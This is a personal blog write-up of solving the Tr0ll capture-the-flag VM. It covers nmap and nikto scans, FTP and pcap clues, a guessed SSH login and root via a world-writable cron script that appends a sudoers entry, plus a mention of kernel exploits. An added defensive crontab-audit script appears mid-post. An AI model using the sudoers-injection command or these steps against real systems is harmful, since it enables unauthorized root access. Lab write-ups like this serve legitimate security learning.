Tuesday, February 7, 2017


I heard about this VM on /r/netsecstudents (I forget which post). I figured I would give this one a shot, even if it's meant to be a bit more difficult than the three Kioptrix VMs I've written about so far.

Right off the bat I perform an nmap and a nikto scan. Nmap showed a few open ports.

root@kali:~# nmap -T4 -A -v

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-07 20:09 EST
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating ARP Ping Scan at 20:09
Scanning [1 port]
Completed ARP Ping Scan at 20:09, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:09
Completed Parallel DNS resolution of 1 host. at 20:09, 0.06s elapsed
Initiating SYN Stealth Scan at 20:09
Scanning [1000 ports]
Discovered open port 21/tcp on
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Completed SYN Stealth Scan at 20:09, 0.05s elapsed (1000 total ports)
Initiating Service scan at 20:09
Scanning 3 services on
Completed Service scan at 20:09, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against
NSE: Script scanning
Initiating NSE at 20:09
Completed NSE at 20:09, 0.23s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Nmap scan report for
Host is up (0.00020s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:5B:3D:FD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.001 days (since Tue Feb  7 20:08:02 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

1   0.20 ms

NSE: Script Post-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)

At this point I checked out what a web browser could show:
The page source didn't show much:
<img src=hacker.jpg>

This is where the nikto scan came in handy.
root@kali:~# nikto -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2017-02-07 20:11:48 (GMT-5)
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-02-07 20:12:03 (GMT-5) (15 seconds)
+ 1 host(s) tested

Checking out (which is pointed out in the robots.txt page) got another meme:

<img src="troll.jpg">

/icons/README contained (among other things):

Suggested Uses

The following are a few suggestions, to serve as a starting point for ideas.
Please feel free to tweak and rename the icons as you like.

          This might be used to represent PostScript or text layout

     alert.black.gif, alert.red.gif
          These can be used to highlight any important items, such as a
          README file in a directory.

     back.gif, forward.gif
          These can be used as links to go to previous and next areas.

     ball.gray.gif, ball.red.gif
          These might be used as bullets.

Going back to the nmap scan I decided to check out the ftp port by going to

This pcap file shows the ftp transfer of secret_stuff.txt. At first I was reading too much into this, thinking I should try and extract the .txt file. I did encounter a great blog showing how to do this though:

"FTP Data Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n\nSucks, you were so close... gotta TRY HARDER!\n)"

sup3rs3cr3tdirlol - a secret directory, huh. Might as well try to find it. I got it on the second try (on the first try I used sup3rs3cr3t).

Another file to decipher...... more trolling. After downloading it I found out the file was an ELF binary.

I spent a good amount of time looking up how to view and edit a binary, even spending a decent amount of time in edb. I was looking for a clue, a troll or something at the memory address "0x0856BF".

As an act of pure luck I decided to try "0x0856BF" as part of a web address.

good_luck/ contained a text file called "which_one_lol.txt"
genphlux < -- Definitely not this one
While this_folder_contains_the_password/ contained a text file called "Pass.txt"

The folder name says the password is in the folder, so I guess the password is "Pass.txt" (not Good_job_:))
At first I thought it was genphlux and "Pass.txt" as the password
After many more guesses I get in with the username: overflow

After a good bit of looking around I found another clue.... maybe even a troll:
Before going further I was kicked out (2nd time it happened).

cleaner.py is a Python script that performs "rm -r /tmp/*". The cool thing is that this file has rwx permissions for all users. If the file is edited to grant the user overflow root permissions, then we're set. The catch is that the script needs to run as root to edit the sudoers file, which makes this a waiting game, since the script is already in root's crontab.

        os.system('echo overflow        ALL=(ALL) ALL >> /etc/sudoers ')

and we have root!
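The weakness that made this escalation possible is a root cron job pointing at a file any user can write. As an added example (not code from this write-up or from the Tr0ll VM), the audit below parses crontab text, resolves each absolute path a command references and flags the ones that are world-writable; the crontab lines and files are constructed samples written to a temporary directory, and the /opt paths are assumed, not taken from the box.

```python
import os
import re
import stat
import tempfile

# Five schedule fields (or @reboot-style shortcut), an optional user field
# as used in /etc/crontab, then the command.
CRON_RE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?:(?P<user>\w+)\s+)?(?P<cmd>.+)$")


def world_writable(path):
    """True when path is a regular file whose mode has the other-write bit."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return stat.S_ISREG(mode) and bool(mode & stat.S_IWOTH)


def audit_crontab(text, root="/"):
    """Return (command, path) pairs where a referenced file is world-writable.

    root lets the check run against a staged filesystem tree instead of /.
    """
    findings = []
    for line in text.splitlines():
        fields = line.split()
        # Skip blanks, comments and environment assignments such as SHELL=/bin/sh.
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        for token in cmd.split():
            if token.startswith("/"):
                path = os.path.join(root, token.lstrip("/"))
                if world_writable(path):
                    findings.append((cmd, token))
    return findings


def demo():
    """Stage a constructed /opt with one 0777 script and one 0755 script."""
    tmp = tempfile.mkdtemp()
    opt = os.path.join(tmp, "opt")
    os.makedirs(opt)
    cleaner, backup = os.path.join(opt, "cleaner.py"), os.path.join(opt, "backup.sh")
    for p in (cleaner, backup):
        with open(p, "w") as f:
            f.write("# constructed sample\n")
    os.chmod(cleaner, 0o777)  # the rwx-for-everyone mode seen on the box
    os.chmod(backup, 0o755)   # not writable by group or others
    crontab = ("SHELL=/bin/sh\n# constructed sample crontab\n"
               "*/2 * * * * root /usr/bin/python /opt/cleaner.py\n"
               "0 3 * * * root /opt/backup.sh\n")
    return audit_crontab(crontab, root=tmp)
```

Running audit_crontab over the real /etc/crontab and /etc/cron.d files (with the default root) is the quickest way to spot this class of misconfiguration on a host you administer.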
While searching around I also got the OS version:
cat /proc/version
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 

There are a few privilege escalation exploits for kernel version 3.13, so I might as well try them as well. Like I've done before, I copy the exploit over to /var/www and get Apache running; this way I can get a copy of it onto the Tr0ll box. I ended up trying four of these before I found one that worked.

There you go. Two ways to get root on this box..... Once you've fought your way past all the Trolling!
